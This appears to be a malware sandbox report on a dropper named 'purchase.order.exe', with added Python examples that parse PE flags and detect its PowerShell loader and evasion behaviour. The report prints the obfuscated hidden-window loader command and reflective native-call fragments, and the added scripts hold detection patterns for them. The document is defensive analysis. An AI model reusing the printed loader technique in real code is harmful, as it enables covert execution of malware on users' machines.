      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: powrprof.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: wkscli.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: umpdc.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: purchase.order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: stem.Core.pdba source: powershell.exe, 00000002.00000002.2642154478.0000000006D9F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: Fathoming.exe, 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2950366409.0000000021901000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Fathoming.exe, Fathoming.exe, 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2950366409.0000000021901000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp
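      The two Static PE information rows above (RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE and DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE) are the Characteristics word of the COFF header and the DllCharacteristics word of the optional header. The pair worth noticing is RELOCS_STRIPPED together with DYNAMIC_BASE: the Windows loader cannot rebase an image that carries no relocation data, so the executable is mapped at its preferred ImageBase and the ASLR opt-in flag has no effect. The script below is an added example and is not part of the Joe Sandbox report; it decodes both flag words from a PE header and reports that mismatch. The header it runs on is constructed by build_header() to carry the flag values listed in the rows, it is not the real purchase.order.exe, and the check relies on the RELOCS_STRIPPED flag rather than inspecting the relocation directory.

```python
"""Decode IMAGE_FILE_HEADER.Characteristics and OPTIONAL_HEADER.DllCharacteristics
from a PE image and flag mitigation settings that do not add up.
Added example; the header in SAMPLE is constructed, not the real sample."""
import struct

# IMAGE_FILE_HEADER.Characteristics bits, values from winnt.h
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits, values from winnt.h
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def _set_bits(table, value):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_flags(data: bytes) -> dict:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> optional header and decode both flag words."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    _, _, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header for both PE32 and PE32+.
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    file_flags = _set_bits(FILE_CHARACTERISTICS, characteristics)
    dll_flags = _set_bits(DLL_CHARACTERISTICS, dll_chars)

    findings = []
    if "DYNAMIC_BASE" in dll_flags and "RELOCS_STRIPPED" in file_flags:
        findings.append("DYNAMIC_BASE set but relocations stripped: image cannot be rebased, ASLR ineffective")
    if "NX_COMPAT" not in dll_flags:
        findings.append("NX_COMPAT not set: image does not opt in to DEP")
    if magic == 0x20B and "HIGH_ENTROPY_VA" not in dll_flags:
        findings.append("64-bit image without HIGH_ENTROPY_VA")
    return {
        "pe32plus": magic == 0x20B,
        "file_characteristics": file_flags,
        "dll_characteristics": dll_flags,
        "findings": findings,
    }


def build_header(characteristics: int, dll_characteristics: int, pe32plus: bool = False) -> bytes:
    """Constructed minimal header with no sections; only the fields parse_pe_flags reads are set."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    magic, opt_size = (0x20B, 240) if pe32plus else (0x10B, 224)
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return dos + b"PE\0\0" + coff + bytes(opt)


# Constructed header carrying exactly the flag values listed in the two report rows.
SAMPLE = build_header(0x0001 | 0x0002 | 0x0004 | 0x0008 | 0x0100,
                      0x0040 | 0x0100 | 0x0400 | 0x8000)

if __name__ == "__main__":
    for key, value in parse_pe_flags(SAMPLE).items():
        print(key, value)
```

      Pointing parse_pe_flags() at the bytes of a real file (open(path, "rb").read()) gives the same two lists the report prints plus the findings; a header with relocations present and DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA and GUARD_CF set produces an empty findings list.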

      Data Obfuscation

      Source: Yara match | File source: 00000002.00000002.2661158092.0000000008F37000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Mailperson220 $Perquisites $Hovmodets), (brugerinformation @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Cumberer = [AppDomain]::CurrentDomain.GetAssembl
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Besnare38)), $gardinprdikenernes).DefineDynamicModule($Oplagsmssigt, $false).DefineType($Godkendelsesbestemmelsernes, $Vidje, [System.
      Source: C:\Users\user\Desktop\purchase.order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)
      Source: C:\Users\user\Desktop\purchase.order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AB225F pushad ; ret 8_2_21AB27F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AB27FA pushad ; ret 8_2_21AB27F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AE09AD push ecx; mov dword ptr [esp], ecx 8_2_21AE09B6
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AB283D push eax; iretd 8_2_21AB2858
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21AB1368 push eax; iretd 8_2_21AB1369
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Fathoming.exe
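      The Process created rows and the two Anti Malware Scan Interface rows in this section are the two places where this loader is visible before any PE is dropped. The command line reads the staged Pennyroyal.Gri file with gc -raw, cuts a three-character token out of it at offset 29825 and invokes that token as a command through the dot operator, so the cmdlet actually run never appears on the command line. The script content AMSI handed to the sandbox then emits an assembly, module and type in memory (DefineDynamicAssembly, DefineDynamicModule, DefineType) and wraps a raw function pointer with GetDelegateForFunctionPointer, which is how PowerShell calls unmanaged code without Add-Type and without a compiler run. The Python below is an added triage example, not code from the report or from Joe Sandbox. Its two inputs are copied from the rows above, the rule names and verdict strings are this example's own, and it makes no claim about which three characters sit at offset 29825 in the staged file.

```python
"""Triage the loader command line and the AMSI-captured script fragments from this report.
Added example: inputs copied from the report rows; rule names and verdicts are this script's own."""
import ntpath
import re
from typing import List

# Constructed input: the command line from the Process created rows.
LOADER_CMDLINE = (
    'powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw '
    r"'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';"
    "$Fortolkningssikker=$Unsolaced207.SubString(29825,3);"
    ".$Fortolkningssikker($Unsolaced207)"
)

# Constructed input: the two Anti Malware Scan Interface rows.
AMSI_FRAGMENTS = [
    "GetDelegateForFunctionPointer((Mailperson220 $Perquisites $Hovmodets), "
    "(brugerinformation @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))"
    "$global:Cumberer = [AppDomain]::CurrentDomain.GetAssembl",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Besnare38)), "
    "$gardinprdikenernes).DefineDynamicModule($Oplagsmssigt, $false)"
    ".DefineType($Godkendelsesbestemmelsernes, $Vidje, [System.",
]

CMDLINE_RULES = {
    # Console hidden from the user (-windowstyle hidden or the -w hidden short form).
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    # Whole staged file read into one string (gc is the Get-Content alias).
    "reads_staged_file": re.compile(r"\b(?:gc|cat|type|Get-Content)\s[^;]*-raw\b", re.I),
    # A short token cut out of that string becomes the command; its name is never on the command line.
    "command_from_substring": re.compile(r"=\s*\$\w+\.SubString\(\s*\d+\s*,\s*\d+\s*\)", re.I),
    # Dot-source or call operator applied to a variable, with the file content as the argument.
    "invokes_variable": re.compile(r"[.&]\s*\$\w+\s*\("),
}
STAGED_PATH = re.compile(r"(?:gc|cat|type|Get-Content)\s[^;]*?'([^']+)'", re.I)
SUBSTRING_ARGS = re.compile(r"SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.I)
SCRIPT_EXTENSIONS = {".ps1", ".psm1", ".psd1", ".txt"}


def analyze_cmdline(cmdline: str) -> dict:
    """Return the matched indicators, the staged file, the SubString arguments and a verdict."""
    hits = [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]
    path_m = STAGED_PATH.search(cmdline)
    sub_m = SUBSTRING_ARGS.search(cmdline)
    staged = path_m.group(1) if path_m else None
    if staged and ntpath.splitext(staged)[1].lower() not in SCRIPT_EXTENSIONS:
        hits.append("non_script_extension")
    # The loader signature is the chain read -> substring -> invoke, not any single rule.
    chained = {"reads_staged_file", "command_from_substring", "invokes_variable"} <= set(hits)
    return {
        "indicators": hits,
        "staged_file": staged,
        "substring": (int(sub_m.group(1)), int(sub_m.group(2))) if sub_m else None,
        "verdict": "suspicious-loader" if chained else ("review" if hits else "clean"),
    }


AMSI_RULES = {
    # Delegate created over a raw function pointer: unmanaged call without Add-Type.
    "delegate_from_pointer": re.compile(r"GetDelegateForFunctionPointer", re.I),
    # Assembly, module and type emitted in memory, never written to disk.
    "dynamic_assembly": re.compile(r"DefineDynamicAssembly|DefineDynamicModule|DefineType", re.I),
    # Walking loaded assemblies; such scripts commonly do this to find a type that exposes GetProcAddress.
    "assembly_enumeration": re.compile(r"CurrentDomain\.GetAssembl", re.I),
}


def analyze_amsi(fragments: List[str]) -> dict:
    """Score AMSI / event 4104 script content for the reflective native-call pattern."""
    hits = sorted({name for frag in fragments for name, rx in AMSI_RULES.items() if rx.search(frag)})
    reflective = {"delegate_from_pointer", "dynamic_assembly"} <= set(hits)
    return {
        "indicators": hits,
        "verdict": "reflective-native-call" if reflective else ("review" if hits else "clean"),
    }


if __name__ == "__main__":
    print(analyze_cmdline(LOADER_CMDLINE))
    print(analyze_amsi(AMSI_FRAGMENTS))
```

      In practice analyze_cmdline() takes the CommandLine field of Sysmon event 1 or Security event 4688 and analyze_amsi() the ScriptBlockText of PowerShell event 4104. The suspicious-loader verdict fires only when read, substring and invoke all appear together, so an ordinary gc -raw of a .txt file only lands in the review bucket; the non_script_extension indicator is extra weight for a staged file whose extension, here .Gri, is not one PowerShell would normally execute.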

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 entries)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 entries)
      Source: C:\Users\user\Desktop\purchase.order.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated 96 times)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe API/Special instruction interceptor: Address: 1EEB6E3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B2096E rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5484
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4204
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe API coverage: 0.2 %
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1452 Thread sleep time: -10145709240540247s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe TID: 4688 Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\purchase.order.exe Code function: 0_2_0040689E FindFirstFileW,FindClose
      Source: C:\Users\user\Desktop\purchase.order.exe Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
      Source: C:\Users\user\Desktop\purchase.order.exe Code function: 0_2_00402930 FindFirstFileW
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004FE9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004FE9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004FE9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: Fathoming.exe, 00000008.00000002.2990340347.0000000006078000.00000004.00000020.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2948566344.0000000006078000.00000004.00000020.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2948126514.0000000006078000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2642154478.0000000006D9F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: VtModule.psm1MSFT_NetEventVmNetworkAdatper.format.ps1xml
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2642154478.0000000006D9F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Fule.cmdletDeMSFT_NetEventVmNetworkAdatper.cdxml
      Note: the *-NetEventVmNetworkAdapter cmdlet names and the MSFT_NetEventVmNetworkAdatper .cdxml/.format.ps1xml file names above are metadata of PowerShell's own NetEventPacketCapture module, resident in powershell.exe memory; "Hyper-V RAW" is the Winsock provider name for Hyper-V sockets, which the Winsock catalog lists on Windows 10 and later whether or not the machine is virtualized. These strings satisfy the VM-related-string heuristic but are not by themselves evidence that the sample probes for a hypervisor. The rdtsc, PEB-read and thread-sleep entries from Fathoming.exe are the evasion indicators to weigh.
      Source: C:\Users\user\Desktop\purchase.order.exe API call chain: ExitProcess graph end node (graph_0-3678)
      Source: C:\Users\user\Desktop\purchase.order.exe API call chain: ExitProcess graph end node (graph_0-3686)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B2096E rdtsc
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe Code function: 8_2_21B22B60 NtClose,LdrInitializeThunk
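      The evasion entries in this section (rdtsc timing, PEB reads through fs:[30h], thread sleeps, low API coverage, directory enumeration) are easier to weigh once the repeated lines are deduplicated per process. The triage helper below is an added example, not Joe Sandbox code or part of this report: it parses behaviour lines in the layout used above, tolerates the run-together text-export form ("Fathoming.exeCode function:"), and tags each process. The sample input is a handful of lines copied from this section and embedded as constructed test data. The 922337203685477 delay equals INT64_MAX // 10000, the largest NT relative interval expressed in milliseconds, so it is treated as an unbounded wait; the 30000 sleep threshold, the 1 % coverage cut-off and the tag names are this example's own choices.

```python
"""Triage helper for the behaviour lines of a Joe Sandbox "Malware Analysis System
Evasion" section.  Added example; not Joe Sandbox code."""
import re
from collections import Counter, defaultdict

# Line shapes seen in the section above.  The text export often runs the source path
# and the event together ("Fathoming.exeCode function:"), so SOURCE_RE stops at the
# first ".exe" and the event regexes do not require whitespace in front of them.
SOURCE_RE = re.compile(r"^Source:\s*(?P<src>[A-Za-z]:\\\S*?\.exe)", re.IGNORECASE)
PEB_RE = re.compile(
    r"Code function:\s*(?P<fn>\d+_\d+_[0-9A-Fa-f]+)\s+mov\s+(?P<reg>e[a-d]x),\s*dword ptr fs:\[00000030h\]")
RDTSC_RE = re.compile(r"Code function:\s*(?P<fn>\d+_\d+_[0-9A-Fa-f]+)\s+rdtsc\b")
FINDFILE_RE = re.compile(r"Code function:\s*(?P<fn>\d+_\d+_[0-9A-Fa-f]+)\s+\S*FindFirstFileW")
SLEEP_RE = re.compile(r"Thread sleep time:\s*(?P<val>-?\d+)s\s*>=\s*(?P<thr>-?\d+)s")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(?P<ms>\d+)")
COVERAGE_RE = re.compile(r"API coverage:\s*(?P<pct>\d+(?:\.\d+)?)\s*%")

# INT64_MAX 100-ns ticks expressed in milliseconds: the largest NT relative interval,
# i.e. a wait that never ends inside any sandbox run.
INFINITE_DELAY_MS = (2**63 - 1) // 10_000  # 922337203685477

# Constructed sample: lines copied from the section above, including the
# run-together form produced by the text export.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B2096E rdtsc 8_2_21B2096E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1452Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe TID: 4688Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6019F mov eax, dword ptr fs:[00000030h]8_2_21B6019F
Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6019F mov eax, dword ptr fs:[00000030h]8_2_21B6019F
Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E1D0 mov ecx, dword ptr fs:[00000030h]8_2_21B5E1D0
Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeAPI coverage: 0.2 %
Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
"""


def parse_line(line):
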